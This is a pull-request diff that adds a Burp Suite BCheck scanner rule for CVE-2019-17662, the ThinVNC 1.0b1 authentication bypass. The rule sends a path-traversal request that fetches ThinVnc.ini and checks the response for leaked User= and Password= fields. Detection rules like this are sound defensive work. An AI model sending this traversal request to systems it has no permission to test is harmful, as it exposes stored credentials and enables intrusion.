Merge pull request #96 from DolphFlynn/CVE-2019-17662

CVE-2019-17662

vulnerabilities-CVEd/CVE-2019-17662 - ThinVNC 10b1 - Auth Bypass.bcheck

@@ -0,0 +1,31 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2019-17662 - ThinVNC 1.0b1 - Auth Bypass"
+    description: "Checks for CVE-2019-17662"
+    author: "Dolph Flynn"
+    tags: "CVE-2019-17662", "thinvnc", "auth-bypass"
+
+
+given host then
+    send request called check:
+        `GET /{random_str(17)}/../../ThinVnc.ini HTTP/1.1
+         Host: {base.request.url.host}
+         Accept-Encoding: gzip, deflate
+         Accept: */*
+         Accept-Language: en-US;q=0.9,en;q=0.8
+         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.82 Safari/537.36
+         Connection: close
+         Cache-Control: max-age=0
+
+`
+
+    if {check.response.status_code} is "200"
+        and {check.response.headers} matches "application/binary"
+        and {check.response.body} matches "\bUser=\b"
+        and {check.response.body} matches "\bPassword=\b" then
+
+        report issue:
+            severity: high
+            confidence: tentative
+            detail: "ThinVNC 1.0b1 - Authentication Bypass."
+    end if